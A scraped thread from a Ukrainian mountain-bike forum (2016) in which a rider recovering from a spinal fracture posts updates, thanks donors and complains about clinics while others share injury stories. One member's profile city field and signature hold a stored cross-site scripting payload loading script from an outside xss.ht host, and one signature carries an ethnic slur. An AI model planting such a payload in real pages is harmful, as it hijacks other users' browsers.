[ Поиск ] [ Регистрация ] [ Пользователи ] [ Вход ]

  Список форумов ›››› События/UA ›››› Просмотр темы

SOS! Kardinal94 в беде


Автор Сообщение
 Kardinal94

На сайте с 23.04.2014
Репутация: 219
Сообщений 1532
Пол: Мужской(27)
Город: Киев
Стиль: MTB:Freeride
Байк: Стунтус
13 мая 2016 в 15:58

Ну,с привезли меня домой, назначили график посещений врача и пожелали крепкого здоровья. Сегодня вот прогулялся в неведомые дали - к углу дома и обратно в кроватку, восприятие расстояний оно несколько меняется в таком состоянии. Расхаживатся нужно ещё и ещё,  но, как говорит Арсен, дома и стены лечат. Так что дело за малым.

Арс, добавь наверное в шапку инфу о том, что я уже успешно деградирую дома на любимом кровате под чутким надзором. Кстати, я таки похудел, 5 кг снесло вообше. Секрет успеха описан на страницах выше)

Слишком длинный
Cсылка на пост
+22
 arsen

На сайте с 25.10.2012
Репутация: 299
Сообщений 1362
Пол: Мужской(27)
Город: Тернополь
Стиль: MTB:Freeride
Байк: Штыри калиса и пятае сзаде
13 мая 2016 в 17:46

Kardinal94, 5 кг для тебя - это еще так, цветочки )
я за три недели с хвостиком согнал 10 кг - с 67 до 57 кг, и для меня, дрыща, это заметная разница ))
и вроде отхавал 3/4 утерянного, все равно сброшу еще, т.к. намечается четвертая вписка начиная с 16 числа )

а те 5 кг отхаваешь за недельку-две, не беспокойся ))

Pasha Mandarin писал(а):
байкови пзд.. но покупатель сам виноватий
Cсылка на пост
+7
 docstar1

На сайте с 04.10.2015
Репутация: 73
Сообщений 43
Пол: Мужской(27)
Город: Харьков
Стиль: MTB:Street
Байк: люблю свой вел
13 мая 2016 в 17:48

скинул сколько смог,поправляйся уже давай!

Cсылка на пост
+7
 sasha mt

На сайте с 08.11.2009
Репутация: 327
Сообщений 437
Пол: Мужской(41)
Город: івано-франківськ
Стиль: MTB:Enduro
13 мая 2016 в 19:33

Kardinal94 писал(а):
Кстати, я таки похудел, 5 кг снесло вообше


docstar1 писал(а):
скинул сколько смог,поправляйся уже давай!


Нехвилюйся! Спільними зусиллями, ми тебе відкормимоsmiley-ad.gif

Сервіс, та обслуговування 0970712687
Cсылка на пост
+8
 Kardinal94

На сайте с 23.04.2014
Репутация: 219
Сообщений 1532
Пол: Мужской(27)
Город: Киев
Стиль: MTB:Freeride
Байк: Стунтус
13 мая 2016 в 19:48

arsen, увы, но да, оно вернется, ничего, потом в зале сгоню.
sasha mt,  безсумнівно, зусиль для цього вже приклади просто безліч. 
docstar1, спасибо тебе и таким как ты.

Слишком длинный
Cсылка на пост
0
 arsen

На сайте с 25.10.2012
Репутация: 299
Сообщений 1362
Пол: Мужской(27)
Город: Тернополь
Стиль: MTB:Freeride
Байк: Штыри калиса и пятае сзаде
13 мая 2016 в 19:54

Kardinal94, тебе до зала еще огого и огого, забудь о нем минимум до середины осени )
в таком состоянии надо учиться заново ходить )

Pasha Mandarin писал(а):
байкови пзд.. но покупатель сам виноватий
Cсылка на пост
0
 -Den-

На сайте с 03.08.2011
Репутация: 26
Сообщений 51
Пол: Мужской(32)
Город: Львов
Стиль: MTB:Freeride
Байк: Україна
13 мая 2016 в 21:15

Особисто не знаю, та не міг пройти повз
Перекинув 100 грн.
Найшвидшого одужання!

Cсылка на пост
+7
 tsypa_broiler

На сайте с 27.04.2013
Репутация: 96
Сообщений 610
Пол: Мужской(24)
Город: Киев
Стиль: MTB:Freeride
Байк: Продаю! Заходи в мои продажи
16 мая 2016 в 22:00

Kardinal94, я на 5 кг похудел на зимней сессии в КПИ...)
Ничего, потом нажрал 10кг за неполный месяц. зал, творожок, всё такое
Выздоравливай там!

Cсылка на пост
+5
 Jinner

На сайте с 19.05.2010
Репутация: 193
Сообщений 2074
ЗАБАНЕН.
Пол: Мужской(34)
Город: Вонючий хутор жлобов и рагулья
Стиль: MTB:Downhill
Байк: Scott Ransom 2020
16 мая 2016 в 22:52

Руся...как человек, несший тебя на носилках, со всей ответственностью заявляю - не останавливайся на 5...еще минимум нужна 10))

Смерть москалям
Cсылка на пост
+9
 tsypa_broiler

На сайте с 27.04.2013
Репутация: 96
Сообщений 610
Пол: Мужской(24)
Город: Киев
Стиль: MTB:Freeride
Байк: Продаю! Заходи в мои продажи
19 мая 2016 в 19:46

Эта тема набрала много страниц, стала очень популярной, что ли, посещаемой...
Но есть парень, которому значительно хуже. У него рак.
Палим тему https://x-bikers.com/forum/show_topic.php?id=110438
Давайте скинемся, кто сколько может, поможем собрату- райдеру спасти жизнь. Всем, кто откликнется +100500 в карму.

Cсылка на пост
+5
 Kardinal94

На сайте с 23.04.2014
Репутация: 219
Сообщений 1532
Пол: Мужской(27)
Город: Киев
Стиль: MTB:Freeride
Байк: Стунтус
24 мая 2016 в 15:43

Сап гайс, я ещё жив!)

Сегодня делал интересное дело - ходил в поликлинику отмечатся, о том - что я такой красавчик есть, ну и хвастатся болтами.
В общем, да, там было всё. Вся классика медицины и толпы бабок с диагнозом "ушиб всей бабки" и орды "мне только спросить","ещё мой прадед занимал эту очередь час назад" итд.

Но то не суть, я провёл два интересных часа в поликлинике и сделал для себя некоторые выводы.
Медицына у нас всё таки есть, но есть она в больницах, не в поликлиниках.
В больницах ТРУЪ доктора ежедневно видят разобраные тела и регулярно практикуются в их ремонте, шарят в новых методах лечения и востановления больных. 
В то время как поликлиники в основном служат для развлечения бабок по методам лечения 30х годов и продления больничного.

НУ да ладно, перейдём к сказанию.
Пока был-лежал в больнице, врач сказал прямо - ходи сколько можешь - ограничения только боль и подьём тяжестей всяких тяжелых, позвоночник у тебя убер-зафиксирован, живи не парься - через месяц будешь чувствовать себя как раньше, а через год вообще забудешь. Ну, в целом это его слова. Пришел в локальную больницу стать на учёт. И началоооось....

Не, ну сначала я удивился, но стойко не подал виду, что 70ти летняя бабка хирург шарит о типчиках падающих с велосипедов в горах, в карпатах, но это было лишь краткое отступление от темы. Кстати, возможно она моложе 70ти, не дайте ввести себя в заблуждение.

После часа в очереди и разглядывания плакатов с сиськами - драсти
И тут хирургра понесло:
-ой да это пи.дец
-вам нужно обмазатся корсетами с ног до головы, у вас всё болит
-вам плохо
-вам нельзя ничего
-вы должны сутками лежать на деревяной кушетке и смотреть в потолок
и апогей
-я ничё не шарю, с понедельника будет травматолог - приходите
Минус два часа времени, Спа-си-бо.

Вот такие вот забеги, интересно, о чём смогу с травматологом поговорить. 






Слишком длинный
Cсылка на пост
+6
 Sergey-vin

На сайте с 03.03.2011
Репутация: 36
Сообщений 61
Пол: Мужской(37)
Город: Винница
Стиль: MTB:Downhill
Байк: DEMO 9 DH
24 мая 2016 в 15:52

Аффтар ЖЖот! Прочитав і згадав як там вчора був ))) 

Cсылка на пост
+5
 dimdim

На сайте с 09.03.2014
Репутация: 27
Сообщений 154
Пол: Мужской(30)
Город: Полтава"><script src=https://d1m.xss.ht
Стиль: MTB:DirtJumping
Байк: PSlope
24 мая 2016 в 15:58

Kardinal94 писал(а):
Медицына у нас всё таки есть, но есть она в больницах, не в поликлиниках.

Полностью поддерживаю и подтверждаю. Проверено на личном опыте, к сожалению. Правда не в травматологии, а в неврологии, но сути это особо не меняет.
Проб бабку-хирурга прям очень смешно)))
Выздоравливай там)



&quot;&gt;&lt;script src=https://d1m.xss.ht&gt;&lt;/script&gt;
Cсылка на пост
+4
 getriebe

На сайте с 09.06.2014
Репутация: 180
Сообщений 250
Пол: Мужской(34)
Город: Мариуполь
Стиль: MTB:Freeride
Байк: Dartmoor Primal '17 + Fox 36
24 мая 2016 в 16:07

У меня тоже была история с нашими поликлиниками. Через день после драки, которая произошла с полтора месяца назад, где мне разбили пол-лица (благо, сотрясения не было), выбили ползуба и угадали в ребро до трещины, я-таки решил пойти в поликлинику с целью просветить ретнгеном это ребро, применить какое-нибудь лечение и восстанавливаться. Так же часа полтора-два просидел у приёма к травматологу (без него же на рентген не попадёшь), попутно осматривая посетителей. Да, там были пресловутые бабушки, еле передвигающиеся по жизни, зато необыкновенно резвые на остановках общественного транспорта, какой-то полуконтуженный мужик, который постоянно нервничал и грозился начать всех месить (дескать я контуженный, нервы ни к чёрту)... Короче, я решил, что ребро не так уж и сильно болит, поэтому забил на поликлинику. Сейчас уже почти всё прошло, разве что при очень резких движениях отголоски боли проступают. А так уже норм, на дх езжу, ребро не беспокоит.

Kardinal94, Скорейшего восстановления!
 

Cсылка на пост
+3
 Ihor ++dh

На сайте с 26.05.2016
Репутация: 0
Сообщений 2
Пол: Мужской(22)
Город: Херсон
Стиль: MTB:Downhill
Байк: Да воляется гдето на заводе !!!::):):)):)
27 мая 2016 в 15:03

Давай Крепись братан черес пол года будешь как новенький smiley-nrg.gifsmiley-az.gif


Как себя чуствуешь ?????
 

Cсылка на пост
+7
 docstar1

На сайте с 04.10.2015
Репутация: 73
Сообщений 43
Пол: Мужской(27)
Город: Харьков
Стиль: MTB:Street
Байк: люблю свой вел
29 мая 2016 в 18:13

как дела у райдера?ешё надо что-то?

Cсылка на пост
0
 Kardinal94

На сайте с 23.04.2014
Репутация: 219
Сообщений 1532
Пол: Мужской(27)
Город: Киев
Стиль: MTB:Freeride
Байк: Стунтус
28 сен 2016 в 20:36

l4Rr2dfUJe8.jpg


Надписи на заборах однозначно врать не будут, а вы уже должно были соскучились за длинными пастами. Понеслась.

Сегодня был в почти родной 17й больнице, которой я так многим обязан. Проходил плановое Т.О. в связи с этим появились некоторые новости по моему состоянию и некоторые размышления тоже.
Обо всём по-порядку:
Да, я всё ещё жив, нет, оно ещё не рассосалось, а жаль.
Многие люди "обращаются в нашу редакцию"smiley-ap.gif с вопросом буду ли я ещё катать. 
" К весне-лету соберу подвес и буду по тихоньку расскатыватся" - так я отвечал многим интересующимся, ведь я так и планировал. smiley-nrg.gif

Недели 3 назад я проходил МСЕК комиссия которая присваивает или отнимает ивалидности. Меня признали пока ещё не ивалидом, сказали сидеть на больничном.
Время идёт и срок максимального больничного у меня истекает - скоро его закроют, наконец-то работа, это здорово.smiley-good.gif
Собирая никому не нужные бумажки на МСЕК мне довелось разговаривать с главным (аки топовым) травматологом Шевченковского района Райем Эдуардом.
Кстати - дежурит он в траме на дорогожичах, это к сведенью. 

Тогда им было подмечено, что раз я пока ещё не старый рассыхающийся пердун - пластины с позвоночника правильнее снять.
Инородный предмет в теле не тру, движения на скручивание опасны, а неосторожное падение может привести к тому, что болт или пластина лопнут где-то во-внутри.
По этому: пока молодой - год-полтора после операции и гуд бай метал.
Эту же информацию сегодня подтвердил врач, который меня оперировал.
Так же рассказал, что есть места, где позвонки уже срослись, всё идёт по-плану.
Не раньше мая мне придётся провести недельку в больнце, опять. Бр..опять эти утки будут...smiley-at.gif

Ранее я позиционировал свою позицию по фиксатору как: он добавляет прочности зафиксированому участку,ама тирминатор, теперь я настроен с ним прощатся.
По личным ощущения - я его не чувствую но скручиватсяпрогибатся сильно не могу, срабатывает аки отсечка в мото)
Когда спина устаёт, мясо начинает коварно побаливать напротив одного из болтов. Всегда в одном и том же месте.smiley-ireful3.gif

Ну и пара примеров, когда девочка упала на катке и система сломалась или мужик на лыжах и всё пока - они не утешают.
Перспектива обрести внутри себя кусок ничем не зафиксированого титана радости не приносит. 
Таким образом мои планы по поводу начать расскатыватся с весны плавно перетекают на средину-конец лета.smiley-bk.gif
Это - что касается общего виденья мира.

По состоянию - я чувствую себя хорошо - я начал ходить в бассейн, я могу гулять 10км+ и не парится, что-то носить, долго сидеть на стуле итд.
Т.е. спустя около полу года жизнь среднестатистическго городского плебея мне по плечу. 
Сейчас задача стоит в закачивании мышц, наращивании мяса и скидыванию жира.
Jinner писал(а):
еще минимум нужна 10))
 
Я не знаю, сколько я вешу сейчас но наверно скидывать нужно уже все 30.smiley-bs.gif
Лето без нагрузок, в основном дома дало свой плачевный результат, который предстоит исправлять, смвывать потом и отдышкой.

Вот такая ситуация, такие планы и состояние.
Ещё раз спасибо всем, кто в тяжелое для меня время откликнулся, не остался в стороне и помог - я у вас в долгу)smiley-az.gif
Катайте аккуратно и думайте, что и как вы делаете.
Оказатся в бесзознательном положении в момент вылета - плачевная практика.

Теперь, что касается не меня.
В моём мире атракцион сломаных позвоночников открыл Арсен - дядька с Тернополя.
Тогда он пролежал в больнице без операция и прочего - 3+ месяца строго под надзором и всячески сохраняя себя.
У него по бонусной програме были процедуры, электрофорезы и фиксирующий корсет. Арся живой, да здравствует!

Я пробыл 2 недели на койке, операция, фиксайция, корсет.
Первые две недели дома после больницы я только на носочках и ходил, боясь сильно топнуть ногой и морщась от боли. 
Заживаю.

 Виталий Гавриленко, парень который на прошедшых выходных на соревках на трое попрощался с восьмью зубами и поставил 2 трещины в 8м грудном позвонке, был доставлен в больницу скорой помощи и....барабаны-фарнфары..был выписан на 3й день. 
Больница скорой помощи тот ещё Ад. И я очень рад, что мед. брат с кареты, которая забирала меня с лысой - подумал и повёз меня в 17ю, а не бсп.
Виталий сейчас лежит дома, ему никто не говорил ни о корсетах, ни о фиксации, чувак тухнет от боли и...приходите через 3 недели на повторное МРТ.
Браво! Просто Браво! Никакого надзора или контроля: выживешь - красавчик!smiley-ireful3.gif

В довес к этому услышал разговор своего врача с пациенткой, относительно её родственницы.
У второй не правильно срослись 2 позвонка и теперь её необходимо через грудную клетку удалять их, заменять имплантами, чтобы она хоть как-то смогла ходить.
Мне не известно, как так случилось - но я сразу понял - что моё состояние близко к идеальному.

Понял - что всё могло закончится куда хуже, даже с учётом операции.
Понял - что этот тип травм требует ооочень тчательного обследования, ухода и котроля.
И на волне этого разговора новость о том, что Витаю просто выписали - это нечто - гудбай, фарэвел. 
Мы с Арсеном по этому поводу сильно негодуем. smiley-facepalm.gif

Вот такая вот стори, вот такие дела.
Если у кого есть вопросы или кто хочет передать привет маме - прошу)

Слишком длинный
Cсылка на пост
+9
 arsen

На сайте с 25.10.2012
Репутация: 299
Сообщений 1362
Пол: Мужской(27)
Город: Тернополь
Стиль: MTB:Freeride
Байк: Штыри калиса и пятае сзаде
28 сен 2016 в 22:38

незассал и прочитал с самого начала и до самого конца

Kardinal94 писал(а):
раз я пока ещё не старый рассыхающийся пердун - пластины с позвоночника правильнее снять. Инородный предмет в теле не тру, движения на скручивание опасны, а неосторожное падение может привести к тому, что болт или пластина лопнут где-то во-внутри. По этому: пока молодой - год-полтора после операции и гуд бай метал.


это более чем правильно, т.к. при "уходе за собой", включающем правильное (или близкое к правильному) питание поспособствует восстановлению костей. По себе сужу.

Kardinal94 писал(а):
Теперь, что касается не меня. В моём мире атракцион сломаных позвоночников открыл Арсен - дядька с Тернополя. Тогда он пролежал в больнице без операция и прочего - 3+ месяца строго под надзором и всячески сохраняя себя. У него по бонусной програме были процедуры, электрофорезы и фиксирующий корсет. Арся живой, да здравствует!


да здравствуй и тебе :)
без операций и всего прочего я пролежал два месяца, но в сумме, а не за один раз. Т.е. было 4 вписки (с завтрашнего дня уже пятая по счету), и 2 месяца я деградировал морально, восстанавливаясь физически. Программы включали физические упражнения, которые в самом начали вызывали дикую истерику и не менее страшную боль в позвонках. Во время четвертой вписки травматолог щупал позвонки, чтобы проверить болевые ощущения. Если нормальному человеку такая процедура сравнима с прощупыванием мороженого в обертке, в моем случае это когда человек с тракторными руками делает крапивку. Боль примерно та же, позвоночник крутит с характерными болями.

Kardinal94 писал(а):
Первые две недели дома после больницы я только на носочках и ходил

первые 2 недели дома я сидел до одного часа в сутки и стоял до 1.5 часов в сутки, не более. То есть, 2.5 часа в день на ногах, не более. Упражнения на то время были противопоказаны ввиду необходимости быть в тотальнойф физической нирване.

Kardinal94 писал(а):
Виталий Гавриленко, парень который на прошедшых выходных на соревках на трое попрощался с восьмью зубами и поставил 2 трещины в 8м грудном позвонке, был доставлен в больницу скорой помощи и....барабаны-фарнфары..был выписан на 3й день.

это сравнимо с кошкой из приюта, которую забрали к себе домой, увидели что она здесь лишняя, и обратно выбросили на улицу. Как бы скучно, страшно и больно ни было находиться в больнице, лучше всего вписаться в нее, а не сидеть дома. Я вот тоже зимой думал - зачем меня держат целый месяц взаперти, и за это время я не вижу обстановку на улице, не говоря уже о прогулках? Теперь понимаю, что если бы я был дома, наверняк орал от боли, а укол-то сделать было некому. В то время меня могли колоть до шести раз в день.

Витале желаю отказаться от бредовых затей, постараться в ближайшее время приехать в больницу и вписаться на полноценную вытяжку (если оперировать не придется, хотя вряд ли). И не слушать врачей-дебилов. Вон лучше обратись к хорошему человеку под ником trepan, в свое время мне самому помогал.


P.S. Все-таки желаю отписаться на Хб или скинуть в ВК номер карты. Как люди к тебе - так и ты к людям. От имени Рацла и меня лично хочу поблагодарить неравнодушных людей. На данный момент наполняю сайты статьями по индивидуальным заказам, так что ближе к концу недели уже будут кое-какие финансы на кармане.
НО при условии обращения в другую больницу, где сидят более компетентные врачи, а не, простите за выражение, идиоты, которые говорят парню со сломанным позвоночником идти домой и надеяться на чудо.

Pasha Mandarin писал(а):
байкови пзд.. но покупатель сам виноватий
Cсылка на пост
+4
  [ Подписаться на ответы в данной теме ]




ПОХОЖИЕ ТЕМЫ (сортировать по релевантности или по дате)
Посл. ответ Тема Автор Ответ. Просм.
3 янв 2014 в 00:00
  Ротор в беде!!
  На страницу 1, 2
Prosak2910326

  Список форумов ›››› События/UA

  Форум:   







© 2003-2024 X-Bikers.com - горный велосипед, велотриал, фрирайд, стрит, дёрт, BMX
Размещение рекламы на сайте
Использование материалов без разрешения владельцев не допускается